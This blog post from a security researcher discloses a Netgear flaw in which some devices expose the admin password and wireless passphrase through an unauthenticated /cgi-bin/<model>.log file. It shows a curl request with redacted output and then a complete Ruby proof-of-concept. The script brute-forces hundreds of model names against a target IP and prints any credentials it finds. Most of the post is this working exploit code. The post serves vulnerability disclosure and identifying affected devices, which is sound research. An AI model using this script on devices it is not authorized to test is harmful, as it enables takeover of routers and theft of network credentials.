Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Netgear Admin Password Disclosure

Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named /cgi-bin/<model>.log – if the device is vulnerable, you’ll get something like this:

>curl http://&lt;ip&gt;/cgi-bin/WNR2000XT.log
Admin login name        admin
Admin password  <snip>
Country Europe
Wireless network name (SSID)    wireless_ext
Wireless channel        6
Security type   WPA2-PSK(AES)
Wireless passphrase     <snip>

The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received. To help identify the vulnerable devices, I pulled a list of all Netgear devices and wrote this script:

#!/usr/bin/env ruby

# Netgear Admin Info Log File Bruteforce PoC
# Copyright 2012 Adam Caudill &lt;adam@adamcaudill.com&gt;
#
# Usage: ruby netgear_adminpass_bt.rb &lt;target-ip&gt;

require 'socket'

PRODUCTS =
["AF711F", "AFM735", "AFT200", "AG711F", "AG711T", "AGM721F", "AGM721T",
"AGM722F", "AGM731F", "AGM732F", "AGM733", "AGM734", "ANT224D10", "ANT2405v1",
"ANT2405v2", "ANT2407", "ANT2409", "ANT2409v1", "ANT2409v2", "ANT24BDC",
"ANT24BNA", "ANT24D18", "ANT24O5", "ANT32405", "APS135W", "APS300W",
"APS525W", "AX741", "AX742", "AX743", "AX744", "AXC761", "AXM751", "AXM752",
"AXM761", "AXM762", "AXM763", "CARP1000", "CG3000", "CG3300D", "CG814M",
"CG814WG", "CGD24G", "CM212", "CMD31T", "CT5B1", "CT5B2", "CT5B6", "CT5W2",
"CT6B1", "CT6B2", "CT6B6", "CVG824G", "DG632", "DG632B", "DG632NA", "DG814",
"DG824M", "DG834B", "DG834Bv2", "DG834Bv3", "DG834Bv4", "DG834GB", "DG834GBv2",
"DG834GNA", "DG834GT", "DG834GUv5", "DG834Gv1", "DG834Gv2", "DG834Gv3",
"DG834Gv4", "DG834Gv5", "DG834GVv1", "DG834GVv2", "DG834Nv1", "DG834Nv2",
"DG834PN", "DG834v1", "DG834v2", "DG834v3", "DG834v4", "DGFV338", "DGN1000",
"DGN2000", "DGN2200", "DGN2200Bv3", "DGN2200M", "DGN2200MB", "DGN2200v1",
"DGN2200v3", "DGN3500", "DGND3300", "DGND3300v1", "DGND3300v2", "DGND3700",
"DGND3700v1", "DGND3700v2", "DGND3800B", "DM111P", "DM111PSPv1", "DM111PSPv2",
"DM111Pv1", "DM111Pv2", "DM602", "DS104", "DS106", "DS108", "DS116", "DS309",
"DS508", "DS516", "DS524", "EA101", "EA201", "EDA4000", "EN104", "EN104TP",
"EN104TPNA", "EN106TP", "EN108", "EN108TP", "EN116", "EN308", "EN308TC",
"EN516", "EN524", "EVA2000", "EVA2200", "EVA5000", "EVA700", "EVA8000",
"EVA9100", "EVA9150", "EVAW111", "FA101", "FA120", "FA310", "FA310TX",
"FA311v1", "FA311v2", "FA312", "FA410", "FA410TX", "FA411", "FA510", "FA511",
"FB105", "FE104", "FE108", "FE116", "FE508", "FE516", "FM114P", "FR114P",
"FR114W", "FR314", "FR318", "FR328S", "FREIGHT", "FS102", "FS104", "FS105",
"FS105NA", "FS105UK", "FS108", "FS108NA", "FS108P", "FS108PNA", "FS116",
"FS116E", "FS116NA", "FS116P", "FS116PNA", "FS205", "FS208", "FS262", "FS305",
"FS308", "FS309T", "FS508", "FS509", "FS509T", "FS510T", "FS516", "FS517TS",
"FS518", "FS518T", "FS524", "FS524S", "FS526T", "FS605NA", "FS605v1",
"FS605v2", "FS605v3", "FS608NA", "FS608v1", "FS608v2", "FS608v3", "FS726",
"FS726AT", "FS726T", "FS726TNA", "FS726TP", "FS726TPNA", "FS728TP",
"FS728TPv1", "FS728TPv2", "FS728TS", "FS750", "FS750AT", "FS750T", "FS750T2",
"FS750T2NA", "FS752TP", "FS752TPS", "FS752TS", "FSM7226RS", "FSM7250RS",
"FSM726", "FSM726E", "FSM726S", "FSM726v1", "FSM726v2", "FSM726v3", "FSM7326P",
"FSM7328PS", "FSM7328S", "FSM7352PS", "FSM7352S", "FSM750S", "FV318",
"FVG318NA", "FVG318v1", "FVG318v2", "FVL328", "FVM318", "FVS114", "FVS124G",
"FVS318G", "FVS318GE", "FVS318N", "FVS318NA", "FVS318v1", "FVS318v2",
"FVS318v3", "FVS328", "FVS336G", "FVS336Gv1", "FVS336Gv2", "FVS338",
"FVS338NA", "FVX538NA", "FVX538v1", "FVX538v2", "FWAG114", "FWG114Pv1",
"FWG114Pv2", "G7328SIP6", "G7352SIP6", "GA302T", "GA311", "GA311NA", "GA511",
"GA620", "GA621", "GA622T", "GC102", "GS104", "GS105", "GS105E", "GS105NA",
"GS108", "GS108E", "GS108Ev1", "GS108Ev2", "GS108NA", "GS108P", "GS108PE",
"GS108PEv1", "GS108PEv2", "GS108T", "GS108Tv1", "GS108Tv2", "GS110T",
"GS110TP", "GS116E", "GS116NA", "GS116v1", "GS116v2", "GS205", "GS208",
"GS308", "GS504", "GS504T", "GS508T", "GS510TP", "GS516T", "GS524T", "GS524TNA",
"GS605", "GS605av", "GS605AV", "GS605NA", "GS608", "GS608AV", "GS608NA",
"GS716T", "GS716TAV", "GS716Tv1", "GS716Tv2", "GS724AT", "GS724T", "GS724TAV",
"GS724TP", "GS724TPS", "GS724TR", "GS724TS", "GS724Tv1", "GS724Tv2", "GS724Tv3",
"GS728TPS", "GS728TS", "GS748AT", "GS748TNA", "GS748TP", "GS748TPS", "GS748TR",
"GS748TS", "GS748Tv1", "GS748Tv2", "GS748Tv3", "GS748Tv4", "GS752TPS",
"GS752TS", "GS752TXS", "GSM5212P", "GSM712", "GSM712F", "GSM7212", "GSM7212F",
"GSM7212P", "GSM7224", "GSM7224P", "GSM7224R", "GSM7224v1", "GSM7224v2",
"GSM7228PL", "GSM7228PS", "GSM7248", "GSM7248R", "GSM7248v1", "GSM7248v2",
"GSM7252PL", "GSM7252PS", "GSM7312", "GSM7324", "GSM7328FL", "GSM7328FS",
"GSM7328S", "GSM7328SO", "GSM7328Sv1", "GSM7328Sv2", "GSM7352S", "GSM7352SO",
"GSM7352Sv1", "GSM7352Sv2", "HA311", "HA501", "HDMG1", "HDMG3", "HDX101",
"HDX111", "HDXB111", "HE102", "HR314", "JDGN1000", "JFS516", "JFS516NA",
"JFS524", "JFS524E", "JFS524F", "JFS524NA", "JGS516", "JGS516NA", "JGS524",
"JGS524E", "JGS524F", "JGS524FNA", "JGS524NA", "JGS524v1", "JGS524v2",
"JGSM7224", "JNR1010", "JNR3000", "JNR3210", "JWNR2000Tv3", "JWNR2000v1",
"JWNR2000v2", "KWGR614", "MA101", "MA111v1", "MA111v2", "MA301", "MA311",
"MA401", "MA521", "MA701", "MBM621", "MBR1200", "MBR1210", "MBR1310",
"MBR624GU", "MBRN3000", "MCA1001v1", "MCA1001v2", "MCAB1001", "ME101", "ME102",
"ME103", "MP101", "MP101REM", "MP115", "MR314", "MR814v1", "MR814v2", "MR814v3",
"MS200", "MS2000", "MS2110", "MS2120", "MVBR1210C", "ND508", "ND520", "NMS100",
"NMS100NA", "NMS200", "NMS2100", "NMS215", "NMS230", "NMS250", "NMS2500",
"NTV200", "NTV200S", "NTV250", "NTV250DU", "NTV340", "NTV350", "NTV550",
"PA101", "PA301", "PE102", "PHS0111", "PHS0112", "PMB0311", "PMB0331NA",
"PMB0332NA", "PMB0333NA", "PMB0334NA", "POE101", "ProLine6100", "PRR0331NA",
"PRR0332", "PRR0333", "PRR0334", "PRR0334E", "PS101v1", "PS101v2", "PS104",
"PS105", "PS110", "PS111W", "PS113", "PS121v1", "PS121v2", "PTV1000", "PTV2000",
"PTVU1000", "R4500", "R6200", "R6300", "RD5200", "RD521210", "RD5D", "RH340",
"RH348", "RM356", "RN00RPL1", "RN00RPL2", "RN00RPL3", "RN12G", "RN12G0620",
"RN12G1220", "RN12P", "RN12P0610", "RN12P0620", "RN12P1210", "RN12P1220",
"RN12P2GE", "RN12PFAN", "RN12PPSU", "RN12PRAIL", "RN12PTRAY", "RN12S",
"RN12S0620", "RN12S1220", "RN12T", "RN12T0620", "RN12T0630", "RN12T1210",
"RN12T1220", "RN12T1230", "RN12T2CX4", "RN12T2SFP", "RND2000", "RND2000v1",
"RND2000v2", "RND2110", "RND2110v1", "RND2110v2", "RND2120", "RND2120v1",
"RND2150", "RND2150v1", "RND2175v1", "RND2210", "RND2210v1", "RND2210v2",
"RND2220", "RND2220v1", "RND4000", "RND4000v1", "RND4000v2", "RND4210",
"RND4210v1", "RND4210v2", "RND4220", "RND4250v1", "RND4410", "RND4410v1",
"RND4410v2", "RND4425v1", "RND4450v1", "RND4FAN1", "RND4M1GB1", "RND4PSU1",
"RND4TRAY1", "RNDP2000", "RNDP200U", "RNDP2210", "RNDP2210D", "RNDP2220",
"RNDP2220D", "RNDP2230", "RNDP2230D", "RNDP4000", "RNDP400U", "RNDP4410",
"RNDP4410D", "RNDP4420", "RNDP4420D", "RNDP4430", "RNDP4430D", "RNDP6000",
"RNDP6000NAS", "RNDP600E", "RNDP600U", "RNDP6310", "RNDP6350", "RNDP6610",
"RNDP6610D", "RNDP6620", "RNDP6620D", "RNDP6630", "RNDP6630D", "RNDTRAY",
"RNDU2000", "RNDU2120", "RNDU2220", "RNDU4000", "RNDU4220", "RNDU6000",
"RNDU6320", "RNDX4000", "RNDX400E", "RNDX4210", "RNDX4250", "RNDX4410",
"RNDX4420", "RNNVR01L", "RNNVR02L", "RNNVR04L", "RNR4000", "RNR4410", "RNR4425",
"RNR4450", "RNR4475", "RNR4FAN1", "RNR4PSU1", "RNR4RL26", "RNR4TRAY1",
"RNR4XCHG", "RNRP4000", "RNRP4410", "RNRP4420", "RNRP4430", "RNRPFAN1",
"RNRPPSU1", "RNRX4000", "RNRX400E", "RNRX4410", "RNRX4410D", "RNRX441E",
"RNRX4420", "RNRX4420D", "RNRX442E", "RNRX4430", "RNRX4430D", "RNRX443E",
"RNRX4450", "RNRXTRAY1", "RNRXXCHG", "RO318", "RP114", "RP334", "RP614NA",
"RP614v1", "RP614v2", "RP614v3", "RP614v4", "RPS5412", "RT311", "RT314",
"RT328", "RT338", "SC101", "SC101T", "SCC", "SPH101", "SPH200D", "SPH200W",
"SRX5308", "SRXN3205", "SSL312", "STM150", "STM150B", "STM150B3", "STM150E",
"STM150E3", "STM150EW", "STM150EW3", "STM150M", "STM150M3", "STM150W",
"STM150W3", "STM300", "STM300B", "STM300B3", "STM300E", "STM300E3", "STM300EW",
"STM300EW3", "STM300M", "STM300M3", "STM300W", "STM300W3", "STM600", "STM600B",
"STM600B3", "STM600E", "STM600E3", "STM600EW", "STM600EW3", "STM600M",
"STM600M3", "STM600W", "STM600W3", "TA612V", "USBG2", "USBG3", "USMG2", "UTM10",
"UTM100", "UTM100B", "UTM100B3", "UTM100E", "UTM100EW", "UTM100EW3", "UTM100M",
"UTM100M3", "UTM100W", "UTM100W3", "UTM10B", "UTM10B3", "UTM10E", "UTM10E3",
"UTM10EW", "UTM10EW3", "UTM10M", "UTM10M3", "UTM10W", "UTM10W3", "UTM150",
"UTM25", "UTM25B", "UTM25B3", "UTM25E", "UTM25E3", "UTM25EW", "UTM25EW3",
"UTM25M", "UTM25M3", "UTM25W", "UTM25W3", "UTM5", "UTM50", "UTM50B", "UTM50B3",
"UTM50E", "UTM50E3", "UTM50EW", "UTM50EW3", "UTM50M", "UTM50M3", "UTM50W",
"UTM50W3", "UTM5B", "UTM5B3", "UTM5E", "UTM5E3", "UTM5EW", "UTM5EW3", "UTM5M",
"UTM5M3", "UTM5W", "UTM5W3", "UTM9S", "VersaLink7500", "VPN01L", "VPN05L",
"VPNG01L", "VPNG05L", "WA301", "WAB102", "WAB501", "WAB502", "WAG102",
"WAG102NA", "WAG302v1", "WAG302v2", "WAG311", "WAG511", "WAG511NA", "WAGL102",
"WC7510L", "WC7520", "WC75NL", "WE102", "WFS709TP", "WG102", "WG102NA", "WG103",
"WG111NA", "WG111T", "WG111U", "WG111US", "WG111v1", "WG111v2", "WG111v3",
"WG121", "WG302NA", "WG302v1", "WG302v2", "WG311NA", "WG311T", "WG311v1",
"WG311v2", "WG311v3", "WG511T", "WG511U", "WG511v1", "WG511v2", "WG602BNA",
"WG602NA", "WG602v1", "WG602v2", "WG602v3", "WG602v4", "WGE101", "WGE101CN",
"WGE111", "WGL102", "WGM124", "WGM511", "WGPS606", "WGPS606NA", "WGR101",
"WGR612", "WGR614L", "WGR614NA", "WGR614v1", "WGR614v10", "WGR614v2",
"WGR614v3", "WGR614v4", "WGR614v5", "WGR614v6", "WGR614v7", "WGR614v8",
"WGR614v9", "WGR826V", "WGT624AU", "WGT624NA", "WGT624SC", "WGT624v1",
"WGT624v2", "WGT624v3", "WGT624v4", "WGT634U", "WGU624", "WGX102v1", "WGX102v2",
"WGXB102", "WIDI1000", "WMS105", "WMS5316", "WN1000RP", "WN111", "WN111v1",
"WN111v2", "WN121T", "WN2000RPT", "WN2000RPTv1", "WN2000RPTv2", "WN2500RP",
"WN3000RP", "WN311B", "WN311T", "WN511B", "WN511T", "WN604", "WN802T",
"WNA1000", "WNA1000M", "WNA1100", "WNA3100", "WNA3100M", "WNAP210", "WNAP320",
"WNB2100", "WNCE2001", "WNCE2004", "WNCE3001", "WNDA3100", "WNDA3100v1",
"WNDA3100v2", "WNDA4100", "WNDAP330", "WNDAP350", "WNDAP360", "WNDAP380R",
"WNDAP620", "WNDR3300", "WNDR3300v1", "WNDR3300v2", "WNDR3400", "WNDR3400v1",
"WNDR3400v2", "WNDR3600v3", "WNDR3700", "WNDR3700v1", "WNDR3700v2",
"WNDR3700v3", "WNDR37AV", "WNDR37AVv1", "WNDR37AVv2", "WNDR3800", "WNDR4000",
"WNDR4500", "WNDRMACv1", "WNDRMACv2", "WNHD3004", "WNHD3004v2", "WNHDE111",
"WNR1000", "WNR1000v1", "WNR1000v2", "WNR1000v3", "WNR1500", "WNR2000",
"WNR2000v1", "WNR2000v2", "WNR2000v3", "WNR2000XT", "WNR2200", "WNR3500",
"WNR3500L", "WNR3500Lv1", "WNR3500Lv2", "WNR3500v1", "WNR3500v2", "WNR500",
"WNR612", "WNR612v2", "WNR612v3", "WNR834Bv1", "WNR834Bv2", "WNR834M",
"WNR854T", "WNXR2000", "WNXR2100", "WPN111", "WPN111RV", "WPN311", "WPN511",
"WPN511RV", "WPN802v1", "WPN802v2", "WPN824EXT", "WPN824N", "WPN824v1",
"WPN824v2", "WPN824v3", "WPNT121", "WPNT511", "WPNT834", "XA601", "XAUB2511",
"XAV1004", "XAV101v1", "XAV101v2", "XAV1101", "XAV1201", "XAV1301v1",
"XAV1301v2", "XAV1501", "XAV1601", "XAV2001", "XAV2101v1", "XAV2101v2",
"XAV2501", "XAV2602", "XAV5001", "XAV5004", "XAV5101", "XAV5201", "XAV5501",
"XAV5601", "XAVB1001", "XAVB1004", "XAVB101", "XAVB1101", "XAVB1201",
"XAVB1301v1", "XAVB1301v2", "XAVB1401", "XAVB1501", "XAVB2001", "XAVB2101v1",
"XAVB2101v2", "XAVB2501", "XAVB2602", "XAVB2602v2", "XAVB5001", "XAVB5004",
"XAVB5101", "XAVB5201", "XAVB5501", "XAVB5601", "XAVB5602", "XAVN2001",
"XAVNB2001", "XAVT5601", "XCM8806", "XCM8810", "XE102v1", "XE102v2", "XE103",
"XE104", "XE104NA", "XE602", "XEB1004", "XEPS103", "XET1001", "XETB1001",
"XETB10GM", "XM128", "XSM7224L", "XSM7224S"]

PORT = 80
host = ARGV[0]

puts "Starting attack, this might take a while..."

begin
  result = nil
  puts "Connecting to #{host}:#{PORT}..."

  PRODUCTS.each_with_index do |product, index|
    puts "Sending request #{index}..." if index % 100 == 0
    sock = TCPSocket.open(host, PORT)
    sock.write("GET /cgi-bin/#{product}.log HTTP/1.1\r\nHost: #{host}\r\n\r\n")

    response = sock.recv(2048)
    sock.close

    if response.inspect.include? "Admin login name"
      result = response
      puts result
      break
    end
  end

  puts "No results found - product/version doesn't seem vulnerable" if result == nil
rescue ::Exception =&gt; e
  puts e
  abort
rescue ::Interrupt
  abort "\r\nExiting on interrupt"
end

Adam Caudill

Related Posts

  • On Software Subscriptions

    Like many in this field, I am always looking for ways to improve my workflow, improve my productivity, achieve more. Part of this is evaluating new tools that help me get work done, tools that become critical to my process. While looking at something that could be useful, I had a startling realization — but there are a couple of things I’d like to cover first. Supporting What You Love I always try to pay for things that make my life better and support businesses that give me real value.

  • Security Done Wrong: Leaky FTP Server

    Update: I’ve just spoken to AMI, and received some very important information; so here are the key points and clarifications: To clarify, the ‘vendor’ I refer to is a customer of AMI; it is this customer’s public FTP server that exposed this information. Per AMI, the signing key included in the ‘Ivy Bridge’ archive is a default test key; AMI instructs customers to change the key before building for a production environment.